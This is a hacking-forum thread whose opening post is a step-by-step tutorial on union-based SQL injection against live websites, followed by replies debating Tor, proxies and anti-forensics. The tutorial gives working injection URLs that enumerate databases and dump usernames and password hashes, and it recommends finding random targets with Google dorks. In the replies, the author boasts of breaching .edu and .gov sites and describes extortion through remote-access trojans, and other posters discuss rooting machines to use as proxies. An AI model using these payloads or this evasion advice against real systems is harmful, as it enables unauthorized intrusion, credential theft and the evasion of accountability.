Author Topic: [tut] Union SQL Injection and string injection (forcing an error)  (Read 11982 times)

0 Members and 1 Guest are viewing this topic.

Offline uSploit

  • /dev/null
  • *
  • Posts: 13
  • Cookies: 7
    • View Profile
Union SQL Injection and string injection (forcing an error)

This tutorial is for educational purposes only! Any misuse of my tutorials is at own risk!

Hello, Evilzone. This is my tutorial on Union SQL Injection and string injection (forcing an error). There are 2 methods in this tutorial. Union based injection and union based string injection.There is only a small difference and will be explained later in this tutorial.

Items we need and stuff we need to complete in this tutorial.
Before you start at anything please install tor browser or get a vpn or use both. If you could even learn anti forensics. For your own ass.

Items we need:
Quote
1.  A text editor of choice. (Using a pen and paper would take to long).
2.  This is manual injection we want a good browser and helping tools. (FIREFOX) for hackbar.
3.  A vulnerable site.
4.  Some fresh Coke and chips. (some spare time)

Things we would learn:
Quote
1.  Understanding what SQL injection is.
2.  Finding vulnerable websites (or finding vulnerabilities on one site.)
3.  Gathering database information.
4.  Learn to know and understand all Attack vectors i use.
5.  Vectors to drop information fast and multiple information out of one column.
6.  Using hex to make it all readable to add your name and more.
8.  Finding admin login pages.

Let the journey to SQL Injection begin!

If you run Firefox, install the hackbar. That will ease your life in SQL injection and XSS for sure!
https://addons.mozilla.org/en-US/firefox/addon/hackbar/

If you don't use Firefox yet, here is the download page: http://www.mozilla.org/en-US/firefox/new/
If you do not want to use firefox it is fine whit me i am only suggesting easy to use tools.

1. Union SQL Injection.

What is SQL Injection? Well SQL Injection is an attack performed on websites who run MySQL or SQL Databases. There are many kinds of SQL Databases.
So SQL is a wide subject to cover. SQL Injection is literally injecting SQL statements in vulnerable entry points to the database. For example user inputs and URL's, i will explain how to check if these are vulnerable later in the tutorial.
In this tutorial i will explain Union injection(this is basic) What is union select? union select is an SQL Statement that joins 2 query's. Ours and the web applications query. Because of that we can select Query's from the database and make it respond to our query.
In this tutorial i will only explain how to do SQL Injection in urls.

2. Finding vulnerable websites (or finding vulnerabilities on one site.)

Checking if a link is vulnerable is actually easy. Its mostly finding the vulnerable one that is the problem.

First off all we need to find a vulnerable website We have to look for an url that takes input or has an id to it. Something like this should be in the end:
.php?id=1 it could also be a whole load of other things .asp?id= or php?id=AWORD and so on. Lets stick to the .php?id=... Because asp most of the times uses MsSql database.
You cant use union on those. Now how to easely find vulnerables? There are scanners on the market even free ones. Even though i like google more.
Ill explain how to do it whit google and google dorks.

Its quite simple and you can use google dorks to find about anything indexed in google you will be happy you learned how to use them.

How do google dorks work?
In most cases we will use the inurl:"" dork. Whit this dork we can find most of the stuff we need.
Of course there are other use full dorks:

google dorks:
Code: [Select]
intitle, intext, inurl, filetype, site, allinurl there are more but these are the use full ones for us.  Interested in more look for google power commands. Google's a hackers friend if you want to know shit use it!

Now how to use dorks, i'm gonna explain 3 of the dorks the most use full ones for SQL Injection. One inurl: , two intext: and three site:

If you use inurl".php?id=" google will show you only sites whit that in the url. Making finding vulnerables easy.
But of course we want to target sites rather then attacking random sites. How do we do that?

site:"www.site.com" inurl:"php?id=" now you will get all results for site.com whit php?id= in the url.


Testing vulnerability:

Code: [Select]
http://www.[site].com/page.php?id=1
http://www.[site].com/page.php?id=1'  [look at the ' single quote.]

Code: [Select]
http://imageshack.us/a/img692/8929/vulntestm.png
If a MySQL error occurs, then it most likely is vulnerable to SQL Injection. There are other kinds of SQL errors, MsSQL errors, MsAcces errors. Microsoft JET errors.
I will be covering the methods to inject those later. Also pages that move content or turn blank are possible injectable (but Lets first start with the basics shall we.)

Example of a MySQL error:

Code: [Select]
You have an error in your SQL syntax;
Check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
You can also see an error like that in the image where we test vulnerability.

3. Gathering database information..

3Te column count:

We need to get the column count in order to successfully SQL inject our target. We can do this by using the order by method. It is actually very simple, you start with trying order by 1-- the web page should now load fine. So keep increasing that number 1 until you get an error.
For example if you hit order by 20 and you get an error. It means you have to go down. If you hit 15 and it said no error it means you have to go up. Now keep increasing by one until you get that error.

Example of ORDER BY:

Code: [Select]
http://www.[site].com/page.php?id=1+order+by+1-- [no error]
http://www.[site].com/page.php?id=1+order+by+100-- [no error]

Oops i had no error on 100? Thats intentionally i have to explain what string injection is.

Code: [Select]
http://imageshack.us/a/img89/4534/order1.png
http://imageshack.us/a/img28/9065/order100.png

Why do i do order by 100? This way we can determine if we need to use string injection.
If you do not get an error when you use order+by+100-- We would need to force an error.

How do we do this:
Code: [Select]
http://www.[site].com/page.php?id=1'+order+by+100--+-I added a singe quote behind the id number and +- at the end of the line edit the spaces whit +. Executing our input as a string we should trigger an error above the columns we need.
Mine isnt really string injection this was just to show you. i removed the tic.
Code: [Select]
http://www.[site].com/page.php?id=1+order+by+1-- [no error]
http://www.[site].com/page.php?id=1+order+by+100-- [error]
http://www.[site].com/page.php?id=1+order+by+10-- no error]
http://www.[site].com/page.php?id=1+order+by+15-- [no error]
http://www.[site].com/page.php?id=1+order+by+16-- [no error]
http://www.[site].com/page.php?id=1+order+by+17-- [error]

Code: [Select]
http://imageshack.us/a/img692/3384/columcount.png

At this point we know one important thing, this web page has 16 columns. Because we had an error saying Unknown column '17' in 'order clause'.
When we executed order+by+16-- we had no error. So the last page whitout an error is the actual column count. Which we are about to need in our next step.

Union Select statement.

Union select is a basic SQL injection method. Also the most common. Union joins 2 query's as explained before. The ID or whatever from the site we try to inject.
And ours, our query's we use to inject the web-page. You will be hearing a lot about query's when you start learning SQL Injection.

The union statement:
Code: [Select]
http://www.[site].com/page.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--

For string injecting: http://www.[site].com/page.php?id=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+-

Code: [Select]
http://imageshack.us/a/img341/9457/unionselect.png

Now look at the content of the site even at the source if you don't see any random numbers popping up.
If it does that are the returned vulnerable columns in our web page. The ones we need to inject our query's in.

If nothing happens it is because we have to ad a - before the id number. This is what we call a negative id. If - wont work try null or 0.
Those might work instead. You can also use null in the union statement. Ill explain the use of this in another tutorial.

As following:
index.php?id=-1

For me a whole load of numbers returned. This makes it easy for me because i can inject more then one statement at a time. We now need to get the version of the SQL database the server is running. If its 5 or higher its easy. If its 4 or below its a long work around. I will be explaining version 4 and less in one of my next tutorials.

Let's ask for version() on our first vulnerable column which was 2.
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14,15,16--
That was one way of finding the version. In some cases it might be blocked or wont work. You can try this statement as well.
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16--
Now where the number previously popped up there the version we requested will show its tails.
We always want it to be 5.x.x or more!

Lets say mine is: 5.5.25-log We also need a lot more things. Because i have so many vulnerable columns i will show the image below with database.
If you have more then one column you can make more then one thing show up at a time. You can even inject hex. And inside the hex HTML if you would prefer to.
For example inputting a name or an image. How to do this. Simple replace the vulnerable column with 0x(HEX CODE)  where it said (hex code) you have to replace it with the text or HTML you want it to be: 0xuSploit and then change uSploit into hex: 7553706c6f6974 and put the 0x in front in order for the database to translate it. You can do this with the hackbar or swingnote website google that. Lets get the database name.

Select database name:

You can simply add your query at another vulnerable column or edit the one you are already using:
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,database(),15,16--Somethimes theres more then one database and another way to show version:
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,,4,5,6,7,8,9,10,@@version,12,13group_concat(database()),15,16--
Save the Database name in notepad for later in the tutorial you will need it.

If the querry for more then one db does not work, You can check this whit the following query.
You won't be needing this a lot though. Just in case.
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(schema_name),12,13,14,15,16+from+information_schema.schemata--
Code: [Select]
http://img29.imageshack.us/img29/3575/versiondbhex.png
My database is called "afa_db" no quotes. (as it pops up at where my vulnerable column shows. You can see this in my screeny.
Now lets get to some more sensitive data!


Gething more information out of one column

It is possible to use the group_concat statement to drag out many information at ones. Easing a hackers life a lot!
How would we be able to do that?
Code: [Select]
group_concat(version(),0x0A,database(),0x0A,user(),0x7553706c6f6974)Lets wrap that code up a bit. I ask for the version then i use hex to create a space inbtween version() and database() and so on otherwise it would be hard to know what is what.
then at the end theres 0x 7553706c6f6974  the 0x is to let db know its hex and the code is my name in hex. So next to the query my name pops up looks epic!

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(version(),0x0A,database(),0x0A,user(),0x7553706c6f6974),12,13,14,15,16--
Selecting the table names.

Stay tuned it's getting more advanced here! As you are probably new to SQL Injection this will be hard the first time. I advice not to copy paste the Query's but to write them one by one.
That is and always will be the best teaching method.

Our query to get all the tables out of our database:
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16+from+information_schema.tables+where+table_schema=database()--
Code: [Select]
http://imageshack.us/a/img716/7397/tablesi.png
Wow, that’s a hell of a Query! Let's clear that out for you:
The group_concat is a statement that has a max length of 1024 characters so it will return 1024 characters max. We use this because there can be a hell load of tables and columns, this eases our work.
So it tells us that group_concat selects table names from information_schema (which is database). Yes no more no less. Loads of words for a small task.

What if you think not all tables showed up?
As i said the group_concat statement has a max length of 1024 characters and if there are more tables or columns we need to get those 2 in some cases. If we want to find all tables you could do this manually using only concat() and adding a limit at the end of our query.
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()+limit+0,1--+-keep increasing that limit until you have all tables.
0,1 | 1,1 | 2,1 | 3,1 | 4,1 | 5,1 | 6,1 | 7,1 | 8,1 | 9,1 | 10,1 | 11,1 and so on.

Now we have all our tables, we should get the columns. But first we need to choose one of the tables we want our columns from.
The list i can choose from: adverts,content,members,news,partners,users. Of course in my case there could have been 2 to choose from. I choose users above members and got it right. The admins always in user or admin table.

What to look for?
administrator(s), member(s)
User(s), admin(s)
tbladmin(s),tblmember(s)

Anything that relates to user logins admin logins you should have a look into.Of course some hackers would also look for email adresses and passwords shopping details in shopping sites or so on.
I choose the table users so lets move on to extracting the column names from our table.

Extracting the column names.

Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16+from+information_schema.columns+where+table_name="users"--+-
Code: [Select]
http://imageshack.us/a/img248/632/magictouchhex.png
Take a close look at the query it looks very similar to our previous one. You only need to change group_concat(table_name) to group_concat(column_name) and .tables to .columns.
At the end of the line change table_schema to table_name and database to "users" (where it said users you have to put the table you got before!).

If you get an error this is not a bad thing lets use some magic fingers to fix this. Let's encode it in HEX! It is because the URL does not accept "administrator" as valid. We can fix this using hex.
http://www.swingnote.com/tools/texttohex.php or go to encoding in your hackbar and click on HEX. Choose the first format.

Code: [Select]
http://imageshack.us/a/img248/3444/columns.png
Where the website says Hello to my little friend there i will paste users.
Below all the hex values will appear.

choose this one: 7573657273 (users)
Ad 0x before those numbers. That way the database knows its hex and can translate it.

How to ad it to a link. Where you now have table_name="users"--
At the end of your link. We need to change to this. table_name=0x7573657273--

Our entire Query would now be:
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16+from+information_schema.columns+where+table_name=0x7573657273--
Now all the column names should have shown up where your vulnerable column is. Mine are as you can see in my screenshot: name,uname,passwd,content.

Look for username and password or whatever relates. I have a uname and passwd inside my list of columns.
Ill use those as an example. This is the interesting part isn't it? Did i finally get your full attention?

We change group_concat(column_name) to group_concat(uname,0x3a,passwd) 0x3a in hex means colon in SQL statements we separate our user from the password whit that colon. whit this said those statements together will give user:pass user2:pass2. If we would not use it its a mess.

At the end of our query,  +from+afa_db.users
The afa_db is the database name we had to look up at start. The users is the table name we searched at the second part of this tutorial. Which we also used to select our columns from.

Our next query:
Code: [Select]
http://www.[site].com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(uname,0x3a,passwd),12,13,14,15,16+from+afa_db.users--This time we do not need a hex for table users. Database will accept our input like that.
Code: [Select]
http://imageshack.us/a/img26/3787/nameandpassmd5.png
I won't be explaining on how to crack passwords. This is purely for educational purposes not for causing harm.
If anything went good? You should now have the name and password. Of course that was only basic union and string SQL injection.
There is a lot more to it you will see loads of that in upcoming tutorials. Mine are:

Login: franchiseuk
Password: cb65... <- its a real hash look in the picture.

To find admin login pages use http://y-shahinzadeh.ir/af/ this site scans for many know admin page names. Or try to connect to the ftp.
Do not forget to use tor or vpn or together to do so.

Thanks for reading! Hope you enjoyed my tutorial.
I wrote this tutorial a year or more back but made it better and added more stuff into it.
~ uSploit
« Last Edit: March 02, 2014, 05:25:01 am by uSploit »

Offline Traitor4000

  • Knight
  • **
  • Posts: 191
  • Cookies: 8
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #1 on: March 01, 2014, 11:07:12 pm »
Before you start at anything please install tor browser

NOOO! We have been through this on EZ 400billion times conclusion: Tor sucks. I have not read your full tutorial yet but we will see, by the way Goals is spelled like that not Gaols.
The most vulnerable part of an impenetrable system is those who believe it to be so.

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #2 on: March 02, 2014, 01:33:42 am »
Yeah don't use Tor for malicious activity. It's been used and abused too much. Instead, I'd use a SOCKS tunnel.
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline uSploit

  • /dev/null
  • *
  • Posts: 13
  • Cookies: 7
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #3 on: March 02, 2014, 05:22:28 am »
I understand, though i have tor built in my distro, its fast and easy to use.
I know it is abused for elligal actions to often, i do combine it whit other anonymity tools and anti forensics.
I know i am safe (for sure not 100%) no one is. Socks alone isn't anonymity trust me been on top-hat-sec for to god dam long those are forensics people selling certificates as well. I know what i'm doing by the way SQL injected a website that holds CEH info and way more. Its an afliate of eccouncill who got hacked a while back for 3 times in a row!

Another thing, can i contribute other subjects on sql injection? example error, MsSQL blind ascii blind time delay double query error based and so on. If someone else contributed that  i wont please understand that i wont look for anything all ready posted i got a life!. But trust me read my tutorials and you will learn things you would not have elsewhere!

Just saying i'm by far not a pro only want to contribute and i try my best to do it HQ.
By the way my english is not my native as i told before but telling me where i am wrong helps!

- uSploit

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #4 on: March 02, 2014, 06:16:16 am »
I understand, though i have tor built in my distro, its fast and easy to use.
I know it is abused for elligal actions to often, i do combine it whit other anonymity tools and anti forensics.
I know i am safe (for sure not 100%) no one is. Socks alone isn't anonymity trust me been on top-hat-sec for to god dam long those are forensics people selling certificates as well. I know what i'm doing by the way SQL injected a website that holds CEH info and way more. Its an afliate of eccouncill who got hacked a while back for 3 times in a row!

Another thing, can i contribute other subjects on sql injection? example error, MsSQL blind ascii blind time delay double query error based and so on. If someone else contributed that  i wont please understand that i wont look for anything all ready posted i got a life!. But trust me read my tutorials and you will learn things you would not have elsewhere!

Just saying i'm by far not a pro only want to contribute and i try my best to do it HQ.
By the way my english is not my native as i told before but telling me where i am wrong helps!

- uSploit

Don't worry too much.
And thanks for the contribution.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #5 on: March 02, 2014, 07:41:13 am »
Indeed, don't take it so harshly. I was simply saying that Tor is unneccesary for such things nowadays. I see no reason to include it in your anonymity set at all, but I suppose it's up to you.

Relax. Your post was fine.
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline iTpHo3NiX

  • EZ's Pirate Captain
  • Administrator
  • Titan
  • *
  • Posts: 2920
  • Cookies: 328
    • View Profile
    • EvilZone
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #6 on: March 02, 2014, 07:49:02 am »
I understand, though i have tor built in my distro, its fast and easy to use.
I know it is abused for elligal actions to often, i do combine it whit other anonymity tools and anti forensics.
I know i am safe (for sure not 100%) no one is. Socks alone isn't anonymity trust me been on top-hat-sec for to god dam long those are forensics people selling certificates as well. I know what i'm doing by the way SQL injected a website that holds CEH info and way more. Its an afliate of eccouncill who got hacked a while back for 3 times in a row!

Another thing, can i contribute other subjects on sql injection? example error, MsSQL blind ascii blind time delay double query error based and so on. If someone else contributed that  i wont please understand that i wont look for anything all ready posted i got a life!. But trust me read my tutorials and you will learn things you would not have elsewhere!

Just saying i'm by far not a pro only want to contribute and i try my best to do it HQ.
By the way my english is not my native as i told before but telling me where i am wrong helps!

- uSploit

No one is safe, the only safe way is to disconnect from the internet, but then what good would sql injection do you. Nice tut, I never really got into sql injection so I can't speak on the validity of this tutorial but it's easy to follow.

But I'd suggest anything but tor, ssh tunnel through vpn through proxychains from a bootable os that is not persistent with a kill switch to wipe data would be one of the more practical ways. Tor is just not safe, how do you think pedos get caught. They are the most paranoid of the bunch of the tor users
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #7 on: March 02, 2014, 07:51:47 am »
ssh tunnel through vpn through proxychains from a bootable os that is not persistent with a kill switch to wipe data would be one of the more practical ways.
Lol a bit overkill for some SQL injecting don't you think? I mean, depending on what site we are talking about obviously.

Socks alone isn't anonymity trust me
Neither is Tor alone. Again, depending on what site's were talking, a chain of SOCKS proxies is a form of anonymity and should be just fine.
« Last Edit: March 02, 2014, 07:54:37 am by lucid »
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #8 on: March 02, 2014, 08:05:30 am »
Indeed, don't take it so harshly. I was simply saying that Tor is unneccesary for such things nowadays. I see no reason to include it in your anonymity set at all, but I suppose it's up to you.

Relax. Your post was fine.
Why not TOR does provide a decent out of the box way to hide one's identity.
That is if used correctly.
You can always chain some proxies behind it , does provide a quite oke way to hide the source.
Trusting random socks is also a little scary.
« Last Edit: March 02, 2014, 08:05:58 am by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline uSploit

  • /dev/null
  • *
  • Posts: 13
  • Cookies: 7
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #9 on: March 02, 2014, 12:21:57 pm »
I got proxychains (the script for it to.) As i said tor is built in in my distro.
Its easy to use. How pedo's get caught well doxing most of the time and because ppl look for them all the time for example many pedo's got scammed by hackers whit rats. SE your way up to his computer pretending your a litle girl. Then when you got enough on the guy you write on his desktop I want 1000 dollars or more and i won't tell to your family and gov. When he pays just give all the info anonymously to the gov and his family :)
They should be to. Yes tor leaves exit nodes. Proxychains removes those and a VPN on top of that should do a lot.
I can of course use socks to which is a popular way of protection ascwell and used by carders a lot.
But any carder i met was on tor whit proxychains the thing is You can never have enough.
Its for SQL Injection. they do log in loads of cases, it's only whit huge sites they report to crime or edu and gov. I actually had more then one .edu .gov and unitek.com but havent defaced unitek there admin page was ip restricted to there network only they where quite sirious in the message that i got reported and yeh i was on tor whit vpn and proxychains used anti forensics i'm fine believe me.
I can tell anyone has it's opinions about anonymity! Using an anon os would indeed be even more secure but where where would you stop... Simply use anti forensics and there's nothing to be scared of. The tools i use is to hide my ip. Anti forensics is making sure there are no traces and more when they get to you. There even are automated anti forensics tools out there. I do many of them. Yes socks i got socks 5 in my browser 1 click. I think off things like that  Then use truecrypt to put all your stuff in or to encrypt your home folder. Just saying that theres loads of steps you could do to stay anonymous. Its not an anonymous tutorial get me its an SQL Injection tutorial :D

No worries i'm not mad or anything just proving my point.

Please watch this site and help anoy the Forensics people its fun!!
https://www.anti-forensics.com/

« Last Edit: March 02, 2014, 12:31:42 pm by uSploit »

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #10 on: March 02, 2014, 12:55:29 pm »

Offline Maxalos

  • NULL
  • Posts: 1
  • Cookies: 0
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #11 on: March 17, 2014, 12:53:43 am »
this is great tut man... i want to see more stuff of you...

Z3R0

  • Guest
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #12 on: March 19, 2014, 08:59:45 am »
...
Trusting random socks is also a little scary.
I believe he was talking about rooting random boxes and turning them into socks proxies. Just speculating though. :)

Also, @OP, no offense, but this topic has been beaten to the ground thousands of times over the last 10 years. If you have the motiviation, I encourage you to write another one, but include topics such as: filter evasion, more detail how the attack itself works, running multiple queries without using stacked queries, things of that nature.

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #13 on: March 19, 2014, 07:41:11 pm »
I believe he was talking about rooting random boxes and turning them into socks proxies. Just speculating though. :)
Yes I was talking about that. You know me...
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline DioGt

  • /dev/null
  • *
  • Posts: 5
  • Cookies: 2
    • View Profile
Re: [tut] Union SQL Injection and string injection (forcing an error)
« Reply #14 on: April 29, 2014, 09:51:39 pm »
Why not TOR does provide a decent out of the box way to hide one's identity.
That is if used correctly.
You can always chain some proxies behind it , does provide a quite oke way to hide the source.
Trusting random socks is also a little scary.

In my opinion it's not about staying anonymous, but make them hard to find you as much as you can..I mean what ever you try you will never be 100% anonymous...

Also even if they find you they need some proof that you did it...So it's also important to clear the traces from your own PC ...

But in the first place, to search for you it means that you did somethink that they notice it..like defacing the site Or but some leaked data online.

So to be ok you have to clear your traces from the web/pc and don't give them a reason to search for you..
« Last Edit: April 29, 2014, 09:54:51 pm by DioGt »